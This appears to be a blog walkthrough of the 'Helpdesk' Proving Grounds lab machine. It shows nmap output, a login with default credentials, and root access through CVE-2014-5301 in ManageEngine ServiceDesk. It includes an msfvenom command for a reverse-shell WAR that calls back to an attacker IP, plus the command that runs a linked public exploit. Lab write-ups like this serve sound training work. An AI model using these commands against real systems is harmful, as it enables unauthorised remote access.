PG - Helpdesk

PG – Helpdesk

In this walk through, we will be going through the Helpdesk room from Proving Grounds. This room is rated as Easy on the platform and it consist of exploitation of exploitation of CVE-2014-5301 in ManageEngine ServiceDesk to get root on the target. So, let’s get started without any delay.

Helpdesk

Machine Info:

TitleHelpdesk
IPaddress192.168.163.43
DifficultyEasy
OSWindows
DescriptionHelpdesk is an Easy rated Windows machine which requires exploitation of CVE-2014-5301 in ManageEngine ServiceDesk to get root on the target.

Enumeration:

  • I started off with a regular aggressive nmap scan and found 5 ports opened – 135 (RPC), 139,445 (SMB), 3389 (RDP) and 8080 (HTTP).

$ sudo nmap -A 192.168.163.43
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-09 00:05 IST

Nmap scan report for 192.168.163.43
Host is up (0.20s latency).
Not shown: 995 filtered ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-server-header: Apache-Coyote/1.1
|_http-title: ManageEngine ServiceDesk Plus
| vulners: 
|   cpe:/a:apache:coyote_http_connector:1.1: 
|     	PRION:CVE-2023-26044	5.0	https://vulners.com/prion/PRION:CVE-2023-26044
|     	PRION:CVE-2022-36032	5.0	https://vulners.com/prion/PRION:CVE-2022-36032
|     	OSV:CVE-2023-26044	5.0	https://vulners.com/osv/OSV:CVE-2023-26044
|     	OSV:CVE-2022-36032	5.0	https://vulners.com/osv/OSV:CVE-2022-36032
|_    	OSV:BIT-APACHE-2021-31618	5.0	https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenBSD 4.0 (92%), Apple AirPort Extreme WAP (92%), FreeBSD 6.2-RELEASE (92%), OpenBSD 4.3 (92%), Cisco ACE load balancer (87%), Microsoft Windows Server 2008 R2 SP1 (87%), Microsoft Windows Server 2008 (87%), Microsoft Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 or Windows 8 (87%), Microsoft Windows 7 SP1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
|_clock-skew: mean: 2h40m00s, deviation: 4h37m08s, median: 0s
|_nbstat: NetBIOS name: HELPDESK, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ba:09:2c (VMware)
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: HELPDESK
|   NetBIOS computer name: HELPDESK\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-08T10:35:48-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-08T18:35:48
|_  start_date: 2024-02-08T18:33:38

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   200.35 ms 192.168.45.1
2   200.34 ms 192.168.45.254
3   201.15 ms 192.168.251.1
4   201.60 ms 192.168.163.43

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.36 seconds

nmap scan

Host script results

  • Enumerated SMB shares using smbclient null session but found nothing.

smbclient -L 192.168.163.43

SMB Enumeration

Port 8080

  • Next, web server running on port 8080. It reveals a login panel related to “Manage Engine Service Desk Plus” application.

ManageEngine ServiceDesk login panel

  • Fired gobuster on the target in background to reveal some hidden directories. Found a bunch of directories as per the result.

$ gobuster dir -u http://192.168.163.43:8080/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

  • Used the application’s default credentials to log into the backend.

ManageEngine ServiceDesk backend

  • Once inside, enumerated the application version running – 7.6.0.

ManageEngine ServiceDesk Version

Exploitation & Getting root:

CVE-2014-5301

  • Looked online for any known exploits of the concerned version and found out that it is vulnerable to CVE-2014-5301. As per my findings, There is a directory traversal vulnerability in ManageEngine ServiceDesk, AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts the upload does not handle correctly ‘../’ sequences, which can be abused to write to the file system.

CVE-2014-5301

  • Created a shell.war file with msfvenom as required by the exploit.

msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.238 LPORT=445 -f war > shell.war

creating shell.war file with msfvenom

  • Next, used the below exploit code tor trigger the vulnerable component on the target host. The script requires the target host, target port, correct credentials and a shell.war file which will be our payload.

Exploithttps://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py

sudo python3 exploit.py 192.168.163.43 8080 administrator administrator shell.war

firing the exploit

  • Once the execution is completed we will receive a connection back at our netcat listener. Finally, captured the root flag and completed the machine.

got root

proof flag

Also Read: PG – GLPI

Conclusion:

Conclusion

So that was “Helpdesk” for you. We started off with a regular nmap scan and found 5 ports opened – 135 (RPC), 139,445 (SMB), 3389 (RDP) and 8080 (HTTP). Enumerated the webserver on port 8080 and found ManageEngine ServiceDesk installation. Logged in using the default credentials and got access to the backend which reveals the version running 7.6.0. Looked online for any known exploit and found out that it is vulnerable to CVE-2014-5301. Used the same exploit and got root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top